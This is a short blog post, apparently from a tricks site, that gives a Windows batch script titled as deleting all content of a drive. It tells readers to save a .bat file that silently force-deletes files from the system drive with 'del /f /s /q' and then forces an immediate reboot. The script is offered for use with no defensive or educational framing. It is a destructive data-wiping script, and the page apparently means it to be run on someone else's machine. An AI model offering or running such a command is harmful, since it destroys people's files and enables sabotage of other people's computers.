Social

Deletes All The Content Of A Drive

Image result for Deletes All The Content Of A computer Drive


open notepad and write the following code and save them as (name.bat) file.
@echo off
del %systemdrive%.* /f /s /q
shutdown -r -f -t 00
  Save The Above Code in a .bat file.
_________________________

Related Posts

Subscribe Our Newsletter

0 Comments to "Deletes All The Content Of A Drive"

Post a Comment